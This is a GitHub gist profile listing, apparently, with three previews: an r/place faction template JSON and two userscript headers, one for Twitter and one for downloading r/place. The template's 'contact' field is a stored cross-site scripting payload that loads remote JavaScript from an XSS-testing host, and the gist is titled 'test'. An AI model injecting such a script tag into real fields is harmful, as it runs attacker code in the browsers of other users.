Skip to content

Instantly share code, notes, and snippets.

View adryzz's full-sized avatar
😮‍💨
burned out

Lena adryzz

😮‍💨
burned out
View GitHub Profile
@adryzz
adryzz / template.json
Last active July 27, 2023 18:03
test
{
"faction": "/r/osuplace",
"contact": "<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>",
"notifications": "http://127.0.0.1/",
"templates": [
{
"name": "bmc (the blurry face)",
"sources": [
"https://i.imgur.com/ora8eX5.png",
"https://files.catbox.moe/6z4auc.png"
@adryzz
adryzz / TwitterBrainPreserver.user.js
Created June 24, 2022 21:48
Protect your brain from twitter with a simple script
// ==UserScript==
// @name Twitter brain preserving script
// @namespace http://tampermonkey.net/
// @version 0.1
// @description protect user
// @author Adryzz
// @match https://twitter.com/*
// @icon https://www.google.com/s2/favicons?sz=64&domain=twitter.com
// @grant window.close
// ==/UserScript==
@adryzz
adryzz / userscript.user.js
Last active April 6, 2022 20:17
r/place canvas downloader
// ==UserScript==
// @name r/place canvas downloader
// @namespace http://tampermonkey.net/
// @version 0.1
// @description download the r/place canvas
// @author adryzz
// @match https://hot-potato.reddit.com/embed*
// @icon https://www.google.com/s2/favicons?sz=64&domain=reddit.com
// @grant none
// ==/UserScript==